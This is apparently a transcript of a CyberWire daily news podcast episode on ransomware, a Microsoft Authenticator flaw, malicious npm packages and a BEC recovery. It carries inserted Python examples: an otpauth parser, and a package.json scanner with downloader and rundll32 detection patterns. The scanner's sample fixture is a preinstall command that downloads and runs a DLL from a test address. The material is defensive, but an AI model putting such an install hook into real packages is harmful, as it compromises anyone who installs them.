The CyberWire Daily Podcast 8.6.24
Ep 2123 | 8.6.24

Cyberattack calls for an early dismissal.

Transcript

Thousands of education sector devices have been maliciously wiped after an attack on a UK MDM firm. A perceived design flaw in Microsoft Authenticator leaves users locked out of accounts. SharpRhino charges ahead to deploy ransomware. North Korea’s Stressed Pungsan provides initial access points for malware distribution. Magniber ransomware targets home users and SMBs. Google patches an Android zero-day. A new Senate bill aims to treat ransomware as terrorism. Microsoft ties security to employee compensation. Guest Kim Kischel, Director of Cybersecurity Product Marketing at Microsoft, discusses how AI is impacting the unified security operations center. A victim of business email compromise gets some good news.

Today is Tuesday August 6th, 2024. I’m Dave Bittner. And this is your CyberWire Intel Briefing.

Thousands of education sector devices have been maliciously wiped after an attack on a UK MDM firm. 

A massive cyberattack on Mobile Guardian, a UK-based mobile device management (MDM) firm, has disrupted schools and businesses globally, affecting North America, Europe, and Singapore. Thousands of iOS and ChromeOS devices were remotely wiped, causing data loss. The company is investigating and has temporarily halted services.

The attack severely impacted Singapore’s education sector, with about 13,000 students from 26 secondary schools unable to access applications on their iPads and Chromebooks. Singapore’s Ministry of Education (MOE) removed the Mobile Guardian app as a precaution and is working to restore device functionality.

The attack underscores vulnerabilities in educational systems and the need for stronger cybersecurity measures, including multi-factor authentication and regular security audits, to protect critical infrastructure from sophisticated cyber threats.

A perceived design flaw in Microsoft Authenticator leaves users locked out of accounts. 

As multi-factor authentication (MFA) becomes more prevalent, users increasingly rely on apps like Microsoft Authenticator to secure their accounts. CSO Online highlights what they describe as a significant design flaw that causes users to be locked out of their accounts. The problem arises when users add a new account via QR code scan—a common setup method—leading to Microsoft Authenticator overwriting accounts that share the same username. This occurs because the app fails to append the issuer’s name to the username, unlike other authentication apps such as Google Authenticator.

This oversight means that users frequently encounter issues when accessing their accounts, often blaming the company issuing the authentication rather than recognizing the flaw within Microsoft Authenticator. This misunderstanding results in wasted helpdesk resources as companies attempt to resolve an issue beyond their control.

Experts have noted that this issue has persisted since the app’s release in 2016. Despite the availability of workarounds, such as using alternative authentication apps or manually entering codes, the problem highlights a significant gap in Microsoft’s design approach. Critics argue that Microsoft’s decision not to align with industry standards, which would prevent such overwriting issues, reflects a lack of consideration for user experience.

This situation underscores the importance of designing software with both security and usability in mind. 
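To make the overwrite concrete, here is a small added example (not code from the podcast, CSO Online or Microsoft) that parses otpauth:// Key URIs and stores them two ways: keyed on the account name alone, as the story describes, and keyed on the (issuer, account) pair. The issuer names, usernames and base32 secrets are constructed for the example.

```python
from urllib.parse import parse_qs, unquote, urlparse


def parse_otpauth(uri):
    """Parse an otpauth://TYPE/LABEL?PARAMS Key URI into its parts.

    LABEL is "issuer:account" or just "account"; the issuer may also be
    given (or repeated) as the ?issuer= parameter, which takes precedence.
    """
    p = urlparse(uri)
    if p.scheme != "otpauth" or p.netloc not in ("totp", "hotp"):
        raise ValueError(f"unsupported URI: {uri!r}")
    label = unquote(p.path.lstrip("/"))
    label_issuer, sep, account = label.partition(":")
    if not sep:  # no colon: the whole label is the account name
        label_issuer, account = "", label_issuer
    params = {k: v[0] for k, v in parse_qs(p.query).items()}
    issuer = params.get("issuer", label_issuer).strip()
    return {"type": p.netloc, "issuer": issuer, "account": account.strip(),
            "secret": params.get("secret", "")}


def add_accounts(uris, key_on_issuer):
    """Simulate an authenticator's account list keyed one of two ways.

    key_on_issuer=False mirrors the behaviour the story describes: entries
    are keyed on the account name alone, so enrolling a second issuer with
    the same username silently replaces the first issuer's secret.
    key_on_issuer=True keys on (issuer, account) and keeps both.
    Returns the store and the list of issuers whose entries were lost.
    """
    store, overwritten = {}, []
    for uri in uris:
        entry = parse_otpauth(uri)
        key = (entry["issuer"], entry["account"]) if key_on_issuer else entry["account"]
        if key in store:
            overwritten.append(store[key]["issuer"])
        store[key] = entry
    return store, overwritten


# Constructed sample: one username enrolled with two different issuers.
# The secrets are dummy base32 strings, not real credentials.
SAMPLE_URIS = [
    "otpauth://totp/WorkVPN:alice%40example.com?secret=JBSWY3DPEHPK3PXP&issuer=WorkVPN",
    "otpauth://totp/Payroll:alice%40example.com?secret=GEZDGNBVGY3TQOJQ&issuer=Payroll",
]

if __name__ == "__main__":
    for flag in (False, True):
        store, lost = add_accounts(SAMPLE_URIS, key_on_issuer=flag)
        print(f"key_on_issuer={flag}: {len(store)} entries kept, lost={lost}")
```

With account-only keys the WorkVPN secret is gone after the Payroll enrolment, which is exactly the lockout the helpdesk then sees; the (issuer, account) key keeps both.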

SharpRhino charges ahead to deploy ransomware. 

Ransomware-as-a-Service (RaaS) group Hunters International has developed SharpRhino, a new C# malware used as an initial infection vector and persistent Remote Access Trojan (RAT). Delivered via a typosquatting domain mimicking Angry IP Scanner, SharpRhino increases privileges and moves laterally to deploy ransomware. Hunters International emerged in October 2023 and ranks among the top ten ransomware actors. Strongly linked to the defunct Hive group, it uses a Rust-based encryptor to lock files with the .locked extension after exfiltration.

SharpRhino disguises itself as a legitimate network tool, signed with a valid code-signing certificate. It communicates with a Cloudflare serverless endpoint that serves as its command-and-control infrastructure, using obfuscated C# code and fileless malware tactics. 

North Korea’s Stressed Pungsan provides initial access points for malware distribution. 

GuardDog software identified two malicious packages in PyPI and npm, linked to a North Korean-aligned threat actor cluster known as “Stressed Pungsan,” aligning with Microsoft’s MOONSTONE SLEET. These packages serve as initial access points for malware distribution, facilitating data exfiltration, credential theft, and lateral movement within targeted environments.

On July 7th, 2024, an npm user named nagasiren978 uploaded “harthat-hash” and “harthat-api,” which downloaded malware from a North Korean command-and-control server, using malicious batch scripts and DLLs to target Windows systems. These packages employed a pre-install script to download and execute a DLL using the “rundll32” utility and then self-destruct to avoid detection.

Analysis revealed these packages impersonated legitimate ones by mimicking their names. The downloaded DLL appeared benign, suggesting it might be an incomplete version or part of testing, indicating possible experimentation by the threat actors.
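As an added defensive example (not code from the podcast, GuardDog or the packages named above), this scanner flags install-time lifecycle hooks in a package.json and the fetch, rundll32-load and self-delete pattern the story describes. The indicator patterns, package names and the 203.0.113.5 test address are constructed for the example.

```python
import json
import re

# Hooks npm runs automatically during `npm install`, before any code is imported.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Indicator patterns (constructed for this example): stagers that fetch a
# payload, the rundll32 loader named in the story, and self-deletion.
INDICATORS = [
    ("rundll32", re.compile(r"\brundll32(\.exe)?\b", re.I)),
    ("downloader", re.compile(r"\b(curl|wget|certutil|bitsadmin|Invoke-WebRequest)\b", re.I)),
    ("remote-url", re.compile(r"https?://", re.I)),
    ("self-delete", re.compile(r"\b(del|erase|rm|Remove-Item)\b.*\.(bat|cmd|dll|exe|js)\b", re.I)),
]

def audit_package_json(text):
    """Return one finding per install-time hook: the hook, its command line
    and the indicator names that matched. An empty indicator list still
    means "review": any install hook runs arbitrary code on the host."""
    scripts = json.loads(text).get("scripts") or {}
    findings = []
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str) or not cmd.strip():
            continue
        hits = [name for name, rx in INDICATORS if rx.search(cmd)]
        findings.append({"hook": hook, "command": cmd, "indicators": hits})
    return findings

def risk(findings):
    """Collapse findings to a triage level: none, review or high."""
    if not findings:
        return "none"
    return "high" if any(f["indicators"] for f in findings) else "review"


# Constructed samples: a preinstall hook mirroring the fetch-load-delete
# pattern described above (RFC 5737 test address), and a benign native
# module that only rebuilds itself on install.
MALICIOUS_PKG = json.dumps({"name": "constructed-pkg", "version": "1.0.0", "scripts": {
    "preinstall": "curl -o %TEMP%\\s.dll http://203.0.113.5/s.dll && "
                  "rundll32 %TEMP%\\s.dll,Run && del %TEMP%\\s.dll",
    "test": "jest"}})
BENIGN_PKG = json.dumps({"name": "native-thing", "version": "2.0.0",
                         "scripts": {"postinstall": "node-gyp rebuild", "test": "mocha"}})

if __name__ == "__main__":
    for label, text in (("malicious", MALICIOUS_PKG), ("benign", BENIGN_PKG)):
        print(label, risk(audit_package_json(text)))
```

Run it over the package.json of each dependency before install (for example in CI) and route "high" results to a block and "review" results to a human; legitimate native modules routinely use postinstall, so the hook alone is not proof of malice.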

Magniber ransomware targets home users and SMBs. 

The Magniber ransomware campaign is aggressively targeting home users worldwide, encrypting devices and demanding ransoms starting at $1,000. Magniber, which began in 2017 as a successor to the Cerber ransomware, has used various methods over the years, including exploiting Windows zero-days, fake updates, and trojanized software cracks. This ransomware mainly targets individual users and small businesses who unwittingly download and execute malicious software.

Recent spikes in Magniber activity have been noted since July 20, 2024, with victims reporting infections after using software cracks or key generators. Once activated, Magniber encrypts files and leaves a ransom note with a URL to a Tor site for payment. Currently, there is no free decryptor for Magniber’s latest versions. Users are advised against using illegal software cracks, as they pose significant security risks.

Google patches an Android zero-day. 

Google announced its August 2024 security patches for Android, addressing over 40 vulnerabilities, including a zero-day flaw, CVE-2024-36971. This high-severity kernel vulnerability, potentially exploited in targeted attacks, can lead to remote code execution with system privileges. Discovered by Google’s Clément Lecigne, it involves a use-after-free condition. Other patched vulnerabilities affect the framework, system, Arm, Imagination Technologies, MediaTek, and Qualcomm components, including one critical Qualcomm flaw allowing a permanent denial-of-service condition. These updates aim to enhance Android’s security against privilege escalation, information disclosure, and DoS attacks.

A new Senate bill aims to treat ransomware as terrorism. 

A new proposal from the Senate Intelligence Committee aims to combat ransomware by treating it like terrorism. Sponsored by Mark Warner (D-VA), the bill seeks to name and shame ransomware gangs as “hostile foreign cyber actors” and designate countries that harbor them as “state sponsors of ransomware,” allowing sanctions similar to those for terrorism. This would be the first U.S. law directly linking ransomware to terrorism.

The bill is intended to elevate ransomware to a national intelligence priority, empowering U.S. agencies to act more aggressively against threats. However, experts question its effectiveness, noting that ransomware groups and their state sponsors are often already under sanctions and questioning if new ones would have any real impact. Critics argue the bill might be more symbolic than practical, signaling Washington’s commitment to addressing ransomware attacks.

Microsoft ties security to employee compensation. 

To address recent criticism for security issues in its products, Microsoft is now linking security performance to employee reviews and compensation.

An internal memo from Microsoft’s chief people officer, Kathleen Hogan, outlines a new “Security Core Priority” policy, emphasizing security over other considerations. Lack of focus on security may impact promotions, salary increases, and bonuses. Employees are expected to integrate security into their work and demonstrate improvements in performance reviews, tracked through the company’s “Connect” tool.

This initiative extends to all roles, with executives having security deliverables tied to their reviews. The policy aims to solidify Microsoft’s security-first mindset across its workforce, crucial for maintaining trust in its software and services globally.

 

Next, I speak with Kim Kischel. She’s Director of Cybersecurity Product Marketing at Microsoft. We talk about how AI is impacting the unified security operations center and how it’s changing the way defenders defend. We’ll be right back.

Welcome back.

A victim of business email compromise gets some good news. 

And finally, it’s nice to be able to share good news from time to time. A Singaporean commodity firm narrowly escaped a significant loss when police intervened to recover nearly all of the $42.3 million taken in a business email compromise (BEC) scam. Interpol reported that the firm mistakenly transferred the funds to a bank account on July 15 after receiving a fraudulent email that appeared to be from a legitimate supplier. The scam was discovered four days later when the actual supplier reported non-payment.

The Singapore Police Force utilized Interpol’s Global Rapid Intervention of Payments (I-GRIP) to track and withhold $39 million from the scammers’ account. Authorities arrested seven individuals and recovered an additional $2 million. Interpol praised the swift cooperation between local law enforcement agencies in recovering the funds and identifying the perpetrators. BEC scams netted over $2.9 billion in 2023, underscoring the importance of such international collaboration.

And that’s the CyberWire.

For links to all of today’s stories, check out our Daily Briefing at the cyberwire dot com.

We’d love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like the show, please share a rating and review in your podcast app. Please also fill out the survey in the show notes or send an email to cyberwire@n2k.com.

We’re privileged that N2K CyberWire is part of the daily routine of the most influential leaders and operators in the public and private sector, from the Fortune 500 to many of the world’s preeminent intelligence and law enforcement agencies.

N2K makes it easy for companies to optimize your biggest investment, your people. We make you smarter about your teams, while making your teams smarter. Learn how at n2k.com.

 

This episode was produced by Liz Stokes. Our mixer is Tré Hester, with original music and sound design by Elliott Peltzman. Our executive producer is Jennifer Eiben. Our executive editor is Brandon Karpf. Simone Petrella is our president. Peter Kilpe is our publisher, and I’m Dave Bittner. Thanks for listening.